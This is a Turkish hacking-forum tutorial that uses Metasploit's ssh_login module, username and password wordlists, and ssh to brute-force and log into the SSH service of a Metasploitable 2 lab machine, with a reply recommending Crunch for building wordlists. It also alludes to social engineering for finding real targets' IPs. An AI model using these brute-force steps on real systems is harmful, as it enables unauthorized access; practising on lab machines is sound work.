Hedefe Port'tan (22) Sızalım! //"P4RS

P4RS

Özel Üye
8 Ocak 2017
5,156
58
Ankara
Merhabalar TürkHackTeam ailesi, bugün sizlere "Hedefe Port'tan (22) Sızmak" konusunu anlatacağım. Bir önceki konumda 21. Port'tan sızmayı göstermiştim ona da bakabilirsiniz. Başka portlar ve başka makinelerde de işlem yapabiliriz arkadşalar isterseniz eğer :) Hadi başlayalım.


Konu Başlıkları
• Hedefe 22.Port'tan Sızmak


Burada M e t a sploitable 2 isimli açıklı makineyi kullanacağım. Bunun ne olduğunu internette aratarak bakabilirsiniz.

JPSbGB.png


Hedefe 22.Port'tan Sızmak

Öncelikle hedefimizin IP adresini öğrenelim. Ben iç ağdan saldıracağım için local IP işimi görecektir. Dış ağda ise Public IP adresini öğrenmek gerek bunun için de sosyal mühendislikler işin içine giriyor ve forumumuzda birçok konu var.
Kod:
ifconfig
yazarak IP adresini öğreniyorum.

xWU07x.jpg


Daha sonra Zenmap de tarama yapıyorum, Target alanına IP adresini yazıyoruz ve Scan butonuna basıyoruz. Portla ilgili detayları bizlere veriyor.

1aSI1K.jpg


Daha sonra msfconsole'u açıyoruz bunu içinde terminale
Kod:
msfconsole
yazalım.

bfRC7c.jpg


Bir önceki konumda 21.Port'tan sızmada exploiti nasıl bulacağınızı yazmıştım burada da yazayım, Zenmap'de Version kısmında ki versiyonu tarayıcı da versiyon_adı exploit şeklinde taratınız.
Terminale gelerek
Kod:
use auxiliary/scanner/ssh/ssh_login
kodunu yazıyoruz ve exploite giriyoruz ve
Kod:
show options
yazarak ayarlarımıza bakıyoruz.

W0N0W1.jpg


Burada port ayarını yapmak için
Kod:
set RHOSTS IP_adresi
yazıyoruz. SSH portuna sızmak için Brute yöntemi uygulayacağız bunun için de username.txt ve password.txt dosyalarına ihtiyacımız var, masaüstüne oluşturabilirsiniz.
Bunları da ayarlamak için
Kod:
set PASS_FILE dosya_yeri
set USER_FILE dosya_yeri
şeklinde ayarlayalım ve exploit yazarak brute'yi başlatalım.

dUdIAB.jpg


Gördüğünüz gibi giriş bilgileri msfadmin-msfadmin imiş.

1QPS0z.jpg


Farklı bir pencere açalım ve
Kod:
ssh msfadmin@IP_adresi
yazalım ve şifreyi girelim. Girdikten sonra bağlantımız gerçekleştirildi, buradan Linux komutları ile bilgilere erişebilirsiniz.

N2fzRy.jpg



IT23OH.png



Konum bu kadardı arkadaşlar, başka bir yazımda görüşmek üzere sağlıcakla kalın...
 

P4RS

Özel Üye
8 Ocak 2017
5,156
58
Ankara
Brute için user pass file alabilir miyim teşekkür ettim emeğinize sağlık

Merhabalar,

Crunch isimli araç ile kendiniz kendi hedefinize uygun user pass oluşturabilirsiniz. :)) Bende ki hedefin şifresini ve kullanıcı adını bildiğim için 9-10 tane kelime bulunan bir listeydi.
 
Üst

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.